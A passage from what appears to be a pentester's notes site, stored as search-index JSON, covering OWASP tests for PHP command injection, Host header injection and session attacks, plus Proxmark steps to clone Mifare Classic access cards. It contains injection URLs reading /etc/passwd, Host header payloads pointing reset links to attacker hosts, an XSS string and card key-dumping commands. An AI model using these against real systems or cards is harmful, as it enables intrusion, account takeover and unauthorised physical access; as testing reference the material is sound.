        PHP code injection vulnerabilities, also known as PHP code execution vulnerabilities, occur when an attacker can inject and execute arbitrary PHP code within a web application. These vulnerabilities are a serious security concern because they allow attackers to gain unauthorized access to the server, execute malicious actions, and potentially compromise the entire web application.

        Malicious Input: Attackers craft input that includes PHP code snippets, often enclosed within PHP tags (<?php ... ?>) or backticks (`).

        Code Execution: When the application processes the attacker's input, it includes the injected PHP code as part of a PHP script that is executed on the server.

        This allows the attacker to run arbitrary PHP code in the context of the web application.

        Command injection: Appending a semicolon to the end of a URL for a .PHP page followed by an operating system command, will execute the command. %3B is URL encoded and decodes to semicolon

        # Directly injecting operating system commands:\nhttp://sensitive/something.php?dir=%3Bcat%20/etc/passwd\n\n########\n# Injecting PHP commands\n#########\n\n# Validating that the injection is possible\nhttp://example.com/page.php?message=test;phpinfo();\nhttp://example.com/page.php?id=1'];phpinfo();\n\n# Executing PHP commands\nhttp://example.com/page.php?message=test;system(cat%20/etc/passwd)\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#special-characters-for-command-injection","title":"Special characters for command injection","text":"

        The following special character can be used for command injection such as:

        | ; & $ > < ' ! \n
        # Uses of | will make command 2 to be executed weather command 1 execution is successful or not.\ncmd1|cmd2\n\n# Uses of ; will make command 2 to be executed weather command 1 execution is successful or not.\ncmd1;cmd2\n\n# Command 2 will only be executed if command 1 execution fails. \ncmd1||cmd2\n\n\n# Command 2 will only be executed if command 1 execution succeeds. \ncmd1&&cmd2\n\n# For example, echo $(whoami) or $(touch test.sh; echo 'ls' > test.sh)\n$(cmd)\n\n# It\u2019s used to execute specific command. For example, whoami \ncmd\n\n>(cmd) : >(ls) \n<(cmd) : <(ls)\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#code-review-dangerous-api","title":"Code Review Dangerous API","text":"

        Be aware of the uses of following API as it may introduce the command injection risks.

        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#java","title":"Java","text":"
        Runtime.exec()\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#cc","title":"C/C++","text":"
        system \nexec \nShellExecute\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#python","title":"Python","text":"
        exec\neval\nos.system\nos.popen\nsubprocess.popen\nsubprocess.call\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-12/#php","title":"PHP","text":"
        system\nshell_exec \nexec\nproc_open \neval\n
        ","tags":["web pentesting","WSTG-INPV-12"]},{"location":"OWASP/WSTG-INPV-13/","title":"Testing for Format String Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.13. Testing for Format String Injection

        ID Link to Hackinglife Link to OWASP Description 7.13 WSTG-INPV-13 Testing for Format String Injection - Assess whether injecting format string conversion specifiers into user-controlled fields causes undesired behavior from the application.","tags":["web pentesting","WSTG-INPV-13"]},{"location":"OWASP/WSTG-INPV-14/","title":"Testing for Incubated Vulnerability","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.14. Testing for Incubated Vulnerability

        ID Link to Hackinglife Link to OWASP Description 7.14 WSTG-INPV-14 Testing for Incubated Vulnerability - Identify injections that are stored and require a recall step to the stored injection. (i.e.: CSV Injection, Blind Stored XSS, File Upload) - Understand how a recall step could occur. - Set listeners or activate the recall step if possible.","tags":["web pentesting","WSTG-INPV-14"]},{"location":"OWASP/WSTG-INPV-15/","title":"Testing for HTTP Splitting Smuggling","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.15. Testing for HTTP Splitting Smuggling

        ID Link to Hackinglife Link to OWASP Description 7.15 WSTG-INPV-15 Testing for HTTP Splitting Smuggling - Assess if the application is vulnerable to splitting, identifying what possible attacks are achievable. - Assess if the chain of communication is vulnerable to smuggling, identifying what possible attacks are achievable.","tags":["web pentesting","WSTG-INPV-15"]},{"location":"OWASP/WSTG-INPV-16/","title":"Testing for HTTP Incoming Requests","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.16. Testing for HTTP Incoming Requests

        ID Link to Hackinglife Link to OWASP Description 7.16 WSTG-INPV-16 Testing for HTTP Incoming Requests - Monitor all incoming and outgoing HTTP requests to the Web Server to inspect any suspicious requests. - Monitor HTTP traffic without changes of end user Browser proxy or client-side application.","tags":["web pentesting","WSTG-INPV-16"]},{"location":"OWASP/WSTG-INPV-17/","title":"Testing for Host Header Injection","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.17. Testing for Host Header Injection

        ID Link to Hackinglife Link to OWASP Description 7.17 WSTG-INPV-17 Testing for Host Header Injection - Assess if the Host header is being parsed dynamically in the application. - Bypass security controls that rely on the header.

        The goal:

        • Assess if the Host header is being parsed dynamically in the application.
        • Bypass security controls that rely on the header.

        Source: https://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#supply-an-arbitrary-host-header","title":"Supply an arbitrary Host header","text":"

        Some intercepting proxies derive the target IP address from the Host header directly, which makes this kind of testing all but impossible; any changes you made to the header would just cause the request to be sent to a completely different IP address. However, Burp Suite accurately maintains the separation between the Host header and the target IP address.

        In Burpsuite, set the target to www.example.com. Then, send your request with modified Host header:

        GET / HTTP/1.1\nHost: www.attacker.com\n

        The front-end server or load balancer that received your request may simply not know where to forward it, resulting in an \"Invalid Host header\" error of some kind. This is especially likely if your target is accessed via a CDN.

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#inject-host-override-headers","title":"Inject host override headers","text":"","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#x-forwarded-host-header-bypass","title":"X-Forwarded Host Header Bypass","text":"
        GET / HTTP/1.1\nHost: www.example.com\nX-Forwarded-Host: www.attacker.com\n

        Potentially producing client-side output such as:

        <link src=\"http://www.attacker.com/link\" />\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#more-headers-bypassing","title":"More headers bypassing","text":"

        Although\u00a0X-Forwarded-Host\u00a0is the de facto standard for this behavior, you may come across other headers that serve a similar purpose, including:

        • X-Host
        • X-Forwarded-Server
        • X-HTTP-Host-Override
        • Forwarded

        In Burp Suite, you can use thec's \"Guess headers\" function to automatically probe for supported headers using its extensive built-in wordlist.

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#injecting-multiple-host-headers","title":"Injecting multiple Host headers","text":"
        GET / HTTP/1.1\nHost:\u00a0www.example.com\nHost: www.attacker.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#http_host-vs-server_name-routing","title":"HTTP_HOST vs. SERVER_NAME Routing","text":"

        By supplying an absolute URL.

        POST https://example.com/passwordreset HTTP/1.1\nHost: www.evil.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#port-based-attack","title":"Port-based attack","text":"

        Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful http://username:password@domain.com syntax:

        POST /user/passwrordeset HTTP/1.1\nHost: example.com:@attacker.net\n

        This may result in a suspicious password reset link. By clicking it, the victim's browser will send the key to attacker.net before creating the suspicious URL popup.

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#persistent-xss-via-host-header-injection","title":"Persistent XSS via Host header injection","text":"
        GET /index.html HTTP/1.1\nHost: cow\\\"onerror='alert(1)'rel='stylesheet'\" http://example.com/ | fgrep cow\\\n

        The response should show a poisoned <link> element:

        <link href=\"http://cow\"onerror='alert(1)'rel='stylesheet'/\" rel=\"canonical\"/>\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#add-line-wrapping","title":"Add line wrapping","text":"

        The website may block requests with multiple Host headers, but you may be able to bypass this validation by indenting one of them like this. Some servers will interpret the indented header as a wrapped line and, therefore, treat it as part of the preceding header's value. Other servers will ignore the indented header altogether.

        GET /example HTTP/1.1 \n    Host: attacker.com \nHost: example.com\n
        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-17/#exploitation","title":"Exploitation","text":"

        https://portswigger.net/web-security/host-header/exploiting

        ","tags":["web pentesting","WSTG-INPV-17"]},{"location":"OWASP/WSTG-INPV-18/","title":"Testing for Server-side Template Injection","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.18. Testing for Server-side Template Injection

        ID Link to Hackinglife Link to OWASP Description 7.18 WSTG-INPV-18 Testing for Server-side Template Injection - Detect template injection vulnerability points. - Identify the templating engine. - Build the exploit.

        Server-side Template Injection in HackingLife

        Web applications commonly use server-side templating technologies (Jinja2, Twig, FreeMaker, etc.) to generate dynamic HTML responses. Server-side Template Injection vulnerabilities (SSTI) occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server. Any features that support advanced user-supplied markup may be vulnerable to SSTI.

        ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-18/#see-my-notes","title":"See my notes","text":"
        • Server Side Template Injections: What is it. How this attack works. Attack classification. Types of databases. Payloads. Dictionaries.
        ","tags":["web pentesting","WSTG-INPV-18"]},{"location":"OWASP/WSTG-INPV-19/","title":"Testing for Server-Side Request Forgery","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.19. Testing for Server-Side Request Forgery | ID | Link to Hackinglife | Link to OWASP | Description | | :--- | :------------------------------ | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------- | | 7.19 | WSTG-INPV-19 | Testing for Server-Side Request Forgery | - Identify SSRF injection points. - Test if the injection points are exploitable. - Asses the severity of the vulnerability. |

        ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-19/#see-my-notes","title":"See my notes","text":"
        • Server Side Request Forgery SSRF: What is it. Payloads. Techniques. Dictionaries. Tools.
        ","tags":["web pentesting","WSTG-INPV-19"]},{"location":"OWASP/WSTG-INPV-20/","title":"Testing for Mass Assignment","text":"

        OWASP Web Security Testing Guide 4.2 > 7. Data Validation Testing > 7.20. Testing for Mass Assignment

        ID Link to Hackinglife Link to OWASP Description 7.20 WSTG-INPV-20 Testing for Mass Assignment - Identify requests that modify objects - Assess if it is possible to modify fields never intended to be modified from outside","tags":["web pentesting","WSTG-INPV-20"]},{"location":"OWASP/WSTG-SESS-01/","title":"Testing for Session Management Schema","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.1. Testing for Session Management Schema

        ID Link to Hackinglife Link to OWASP Description 6.1 WSTG-SESS-01 Testing for Session Management Schema - Gather session tokens, for the same user and for different users where possible. - Analyze and ensure that enough randomness exists to stop session forging attacks. - Modify cookies that are not signed and contain information that can be manipulated.

        Session management in web applications refers to the process of securely handling and maintaining user sessions. A session is a period of interaction between a user and a web application, typically beginning when a user logs in and ending when they log out or their session expires due to inactivity. During a session, the application needs to recognize and track the user, store their data, and manage their access to different parts of the application.

        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#components","title":"Components","text":"
        • Session Identifier: A unique token (often a session ID) is assigned to each user's session. This token is used to associate subsequent requests from the user with their session data.
        • Session Data: Information related to the user's session, such as authentication status, user preferences, and temporary data, is stored on the server.
        • Session Cookies: Session cookies are small pieces of data stored on the user's browser that contain the session ID. They are used to maintain state between the client and server.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#what-is-session-used-for","title":"What is session used for","text":"
        • User Authentication: Session management is critical for user authentication. After a user logs in, the session management system keeps track of their authenticated state, allowing them to access protected resources without repeatedly entering credentials.
        • User State: Web applications often need to maintain state information about a user's activities. For example, in an e-commerce site, the session management system keeps track of the items in a user's shopping cart.
        • Security: If proper session management is not implemented correctly, it can lead to vulnerabilities such as session fixation, session hijacking, and unauthorized access.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-01/#session-management-testing","title":"Session Management Testing","text":"

        Some typical vulnerabilities related to session management are:

        • Session Fixation Testing: Test for session fixation vulnerabilities by attempting to set a known session ID (controlled by the tester) and then login with another account. Verify if the application accepts the predefined session ID and allows the attacker access to the target account.
        • Session Hijacking Testing: Test for session hijacking vulnerabilities by trying to capture and reuse another user's session ID. Tools like Wireshark or Burp Suite can help intercept and analyze network traffic for session data.
        • Session ID Brute-Force: Attempt to brute force session IDs to assess their complexity and the application's resistance to such attacks.
        ","tags":["web pentesting","WSTG-SESS-01"]},{"location":"OWASP/WSTG-SESS-02/","title":"Testing for Cookies Attributes","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.2. Testing for Cookies Attributes

        ID Link to Hackinglife Link to OWASP Description 6.2 WSTG-SESS-02 Testing for Cookies Attributes - Ensure that the proper security configuration is set for cookies (HTTPOnly and Secure flag, Samesite=Strict)","tags":["web pentesting","WSTG-SESS-02"]},{"location":"OWASP/WSTG-SESS-03/","title":"Testing for Session Fixation","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.3. Testing for Session Fixation

        ID Link to Hackinglife Link to OWASP Description 6.3 WSTG-SESS-03 Testing for Session Fixation - Analyze the authentication mechanism and its flow. - Force cookies and assess the impact. - Check whether the application renew the cookie after a successfully user authentication.

        Session fixation is a web application security attack where an attacker sets or fixes a user's session identifier (session token) to a known value of the attacker's choice. Subsequently, the attacker tricks the victim into using this fixed session identifier to log in, thereby granting the attacker unauthorized access to the victim's session.

        The attacker obtains a session token issued by the target web application. This can be done in several ways, such as:

        • Predicting or guessing the session token: Some web applications generate session tokens that are easy to predict or lack sufficient randomness.
        • Intercepting the session token: If the application doesn't use secure channels (e.g., HTTPS) to transmit session tokens, an attacker may intercept them as they travel over an insecure network, such as an open Wi-Fi hotspot.

        With a session token in hand, the attacker sets or fixes the victim's session token to a known value that the attacker controls. This value could be one generated by the attacker or an existing valid session token.

        The attacker lures the victim into using the fixed session token to log in to the web application. This can be accomplished through various means:

        • Sending the victim a link that includes the fixed session token.
        • Manipulating the victim into clicking on a specially crafted URL.
        • Social engineering tactics to convince the victim to log in under specific circumstances.

        Once the victim logs in with the fixed session token, the attacker can now hijack the victim's session. The web application recognizes the attacker as the legitimate user since the session token matches what is expected.

        ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-03/#mitigation","title":"Mitigation","text":"
        • Implementing a session token renewal after a user successfully authenticates.
        • The application should always first invalidate the existing session ID before authenticating a user, and if the authentication is successful, provide another session ID.
        • Prevent \"forced cookies\" with full HSTS adoption.
        ","tags":["web pentesting","WSTG-SESS-03"]},{"location":"OWASP/WSTG-SESS-04/","title":"Testing for Exposed Session Variables","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.4. Testing for Exposed Session Variables

        ID Link to Hackinglife Link to OWASP Description 6.4 WSTG-SESS-04 Testing for Exposed Session Variables - Ensure that proper encryption is implemented (Encryption & Reuse of session Tokens vulnerabilities). - Review the caching configuration. - Assess the channel and methods' security (Send sessionID with GET method ?)","tags":["web pentesting","WSTG-SESS-04"]},{"location":"OWASP/WSTG-SESS-05/","title":"Testing for Cross Site Request Forgery","text":"OWASP

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.5. Testing for Cross Site Request Forgery

        ID Link to Hackinglife Link to OWASP Description 6.5 WSTG-SESS-05 Testing for Cross Site Request Forgery - Determine whether it is possible to initiate requests on a user's behalf that are not initiated by the user. - Conduct URL analysis, Direct access to functions without any token.

        Cross Site Request Forgery (CSRF) is a type of web security vulnerability that occurs when an attacker tricks a user into performing actions on a web application without their knowledge or consent. A successful CSRF exploit can compromise end user data and operation when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application.

        ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-05/#see-my-notes","title":"See my notes","text":"
        • CSRF attack - Cross Site Request Forgery
        ","tags":["web pentesting","WSTG-SESS-05"]},{"location":"OWASP/WSTG-SESS-06/","title":"Testing for Logout Functionality","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.6. Testing for Logout Functionality

        ID Link to Hackinglife Link to OWASP Description 6.6 WSTG-SESS-06 Testing for Logout Functionality - Assess the logout UI. - Analyze the session timeout and if the session is properly killed after logout.","tags":["web pentesting","WSTG-SESS-06"]},{"location":"OWASP/WSTG-SESS-07/","title":"Testing Session Timeout","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.7. Testing Session Timeout

        ID Link to Hackinglife Link to OWASP Description 6.7 WSTG-SESS-07 Testing Session Timeout - Validate that a hard session timeout exists, after the timeout has passed, all session tokens should be destroyed or be unusable.","tags":["web pentesting","WSTG-SESS-07"]},{"location":"OWASP/WSTG-SESS-08/","title":"Testing for Session Puzzling","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.8. Testing for Session Puzzling

        ID Link to Hackinglife Link to OWASP Description 6.8 WSTG-SESS-08 Testing for Session Puzzling - Identify all session variables. - Break the logical flow of session generation. - Check whether the application uses the same session variable for more than one purpose","tags":["web pentesting","WSTG-SESS-08"]},{"location":"OWASP/WSTG-SESS-09/","title":"Testing for Session Hijacking","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.9. Testing for Session Hijacking

        ID Link to Hackinglife Link to OWASP Description 6.9 WSTG-SESS-09 Testing for Session Hijacking - Identify vulnerable session cookies. - Hijack vulnerable cookies and assess the risk level.

        An attacker who gets access to user session cookies can impersonate them by presenting such cookies. This attack is known as session hijacking.

        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#testing","title":"Testing","text":"

        The testing strategy is targeted at network attackers, hence it only needs to be applied to sites without full HSTS adoption (sites with full HSTS adoption are secure, since their cookies are not communicated over HTTP).

        We assume to have two testing accounts on the website under test, one to act as the victim and one to act as the attacker. We Web Security Testing Guide v4.2 214 simulate a scenario where the attacker steals all the cookies which are not protected against disclosure over HTTP, and presents them to the website to access the victim\u2019s account. If these cookies are enough to act on the victim\u2019s behalf, session hijacking is possible.

        Steps for executing this test: 1. Login to the website as the victim and reach any page offering a secure function requiring authentication. 2. Delete from the cookie jar all the cookies which satisfy any of the following conditions. in case there is no HSTS adoption: the Secure attribute is set. in case there is partial HSTS adoption: the Secure attribute is set or the Domain attribute is not set. 3. Save a snapshot of the cookie jar. 4. Trigger the secure function identified at step 1. 5. Observe whether the operation at step 4 has been performed successfully. If so, the attack was successful. 6. Clear the cookie jar, login as the attacker and reach the page at step 1. 7. Write in the cookie jar, one by one, the cookies saved at step 3. 8. Trigger again the secure function identified at step 1. 9. Clear the cookie jar and login again as the victim. 10. Observe whether the operation at step 8 has been performed successfully in the victim\u2019s account. If so, the attack was successful; otherwise, the site is secure against session hijacking.

        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-09/#mitigation","title":"Mitigation","text":"
        • Full HSTS adoption.
        ","tags":["web pentesting","WSTG-SESS-09"]},{"location":"OWASP/WSTG-SESS-10/","title":"Testing JSON Web Tokens","text":"

        OWASP Web Security Testing Guide 4.2 > 6. Session Management Testing > 6.10. Testing JSON Web Tokens

        ID Link to Hackinglife Link to OWASP Description 6.10 WSTG-SESS-10 Testing JSON Web Tokens - Determine whether the JWTs expose sensitive information. - Determine whether the JWTs can be tampered with or modified.","tags":["web pentesting","WSTG-SESS-10"]},{"location":"RFID/mifare-classic/","title":"Mifare Classic","text":"","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic_1","title":"Mifare classic","text":"

        The MiFare CanaNFC-based NFC based chip following the\u00a0ISO 14443A\u00a049\u00a0standard. The memory of this chip (assuming we are talking about the Classic 1K) is divided into 16 sectors of 64 bytes each. Like most, if not all, NFC cards it also contains UID and other data. Each sector can contain 2 keys as well as access condition information. All of these sectors can be encrypted with the Crypto1 algorithm to protect the data from being copied. Each key in each sector can be used to open a door (or anything else) in a sequence that goes something like this:

        1. Reader detects NFC card and sends out information to unlock at least 1 sector on the MiFare Classic chip
        2. Assuming the MiFare classic is programmed for this door, it sends back the key and access conditions
        3. The reader validates the key and access conditions it receives and checks if the UID of the key is valid or within a specified range
        4. If everything is in order, the reader opens the door
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-cards","title":"Mifare Classic Cards","text":"
        • Mifare Classic 1K
        • Mifare Classic 4K
        • Mifare Classic EV1

        In a Mifare classic card there are sectors, and each sector contains a number of blocks. Each sector has a sector trailer, which is a block through which you can access data. That means that access conditions are stored in the sector trailer (the key A, the key B and the access bits.)

        Each Mifare Tag has a 4Bytes UID which is unique and not changeable. Some Mifare cards have a 7 Byte UID.

        Transport configuration: At chip delivery, all keys are set to 0xFF FF FF FF FF FF (6 times FFh) and the bytes 6, 7 and 8 are set to 0xFF0780 (See Transport Configuration.) Additionally byte-9 is used for general purpose 1 byte user data. Factory default value is 0x69. Therefore, at chip delivery sector trailer would be:

        0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

        Or:

        Key A Access bits Key B FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF

        Transport configuration is the name for factory default keys and configuration: - KeyA: 0x FF FF FF FF FF FF (Default Key - Cannot be readable) - KeyB: 0x FF FF FF FF FF FF (Default Data) KeyB is used as data in transport configuration because it is readable. It cannot be used as authentication key. - Access Bits: 0xFF0780 Access Bits: 0xFF0780 meaning: - KeyA never be read, but can write(change) itself. - KeyA can read/write Access Bits and KeyB. - Notice that the KeyB is read-able by KeyA. Thus, KeyB cannot be used as an authentication key. It can be used for general purpose user data. - KeyA is allowed to read/write/increment/decrement for the data blocks

        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classics-1k","title":"Mifare Classics 1K","text":"

        Memory Organization:

        • 1024 Bytes
        • Sectors and Blocks:
        • 16 Sectors (0-15).
        • 4 block in each Sector
        • 16 Bytes in each Block
        • 2 Keys (A/B) in each Sector
        • Sector Trailer
        • Authentication is required

        Access bits and conditions: Attention: With each memory access the internal logic verifies the format of the access conditions. If it detects a format violation the whole sector is irreversibly blocked.

        On chip delivery the access conditions for the sector trailers and KeyA are predefined as Transport Configuration. Since KeyB may be read in the transport configuration, it cannot be used as authentication key and new cards must be authenticated with KeyA. Since the access bits themselves can also be blocked, special care has to be taken during the personalization of cards.

        Access conditions of sector trailer:

        Access Conditions of Data Block

        Following example analysis the Transport Configuration Access Bits (0xFF0780):

        • Byte6 = 0xFF
        • Byte7 = 0x07
        • Byte8 = 0x80
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#mifare-classic-4k","title":"Mifare Classic 4K","text":"

        Structure Memory Structure:

        • 4096 Bytes
        • 40 Sectors (0-39)
        • 32 Sectors (0 \u2013 31 ) are of 4 Blocks
        • 8 Sectors are of 16 Blocks
        • Each Sector has Sector Trailer Block
        • Authentication is required
        ","tags":["pentesting","NFC","RFID"]},{"location":"RFID/mifare-classic/#cloning-a-mifare-classic","title":"Cloning a MIFARE classic","text":"

        Proxmark Cheat sheet

        Make sure that it's a MIFARE classic 1K card:

        hf search\n

        Lats line should return:

        Valid ISO14443A Tag Found - Quitting Search\n

        In this case it\u2019s a Mifare 1k card. Copy the UID of the card, which we\u2019ll need later. From there we can find keys in use by checking against a list of default keys (hopefully one of these has been used):

        hf mf chk --1k -f mfc_default_keys\n

        Results:

        Found valid key:[ffffffffffff]  \n

        This shows a key of ffffffffffff, which we can plug into the next command, which dumps keys to file:

        hf mf nested --1k --blk 0 -a -k FFFFFFFFFFFF --dump\n

        This dumps keys from the card into the file dumpkeys.bin. The output should be something like this:

        [+] Testing known keys. Sector count 16\n[+] Fast check found all keys\n\n[+] found keys:\n\n[+] -----+-----+--------------+---+--------------+----\n[+]  Sec | Blk | key A        |res| key B        |res\n[+] -----+-----+--------------+---+--------------+----\n[+]  000 | 003 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  001 | 007 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  002 | 011 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  003 | 015 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  004 | 019 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  005 | 023 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  006 | 027 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  007 | 031 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  008 | 035 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  009 | 039 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  010 | 043 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  011 | 047 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  012 | 051 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  013 | 055 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  014 | 059 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+]  015 | 063 | FFFFFFFFFFFF | 1 | FFFFFFFFFFFF | 1\n[+] -----+-----+--------------+---+--------------+----\n[+] ( 0:Failed / 1:Success )\n\n[+] Generating binary key file\n[+] Found keys have been dumped to `/home/ME/hf-mf-<UID>-key.bin`\n[=] --[ FFFFFFFFFFFF ]-- has been inserted for unknown keys where res is 0\n

        Another way is to do an autopwn:

        hf mf autopwn\n

        Now to dump the contents of the card:

        hf mf dump --1k\n

        This dumps data from the card into dumpdata.bin. The output should be something like this:

        Using... hf-mf-<UID>-key.bin\n[+] Loaded binary key file `/home/ME/hf-mf-<UID>-key.bin`\n[=] Reading sector access bits...\n[=] .................\n[+] Finished reading sector access bits\n[=] Dumping all blocks from card...\n \ud83d\udd53 Sector...  9 block... 3 ( ok )[#] Can't select card\n[#] Can't select card\n \ud83d\udd51 Sector... 15 block... 1 ( ok )[#] Can't select card\n \ud83d\udd53 Sector... 15 block... 3 ( ok )\n[+] Succeeded in dumping all blocks\n\n[+] time: 9 seconds\n\n\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]  sec | blk | data                                            | ascii\n[=] -----+-----+-------------------------------------------------+-----------------\n[=]    0 |   0 | FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF | .B........]..6..\n[=]      |   1 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   2 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   3 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    1 |   4 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   5 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   6 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   7 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    2 |   8 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |   9 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  10 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  11 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    3 |  12 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  13 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  14 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  15 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    4 |  16 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  17 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  18 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  19 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    5 |  20 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  21 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  22 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  23 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    6 |  24 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  25 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  26 | 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ................ \n[=]      |  27 | FF FF FF FF FF FF FF 07 80 69 FF FF FF FF FF FF | .........i......\n[=]    7 |  28 | 00 00 00 00 00 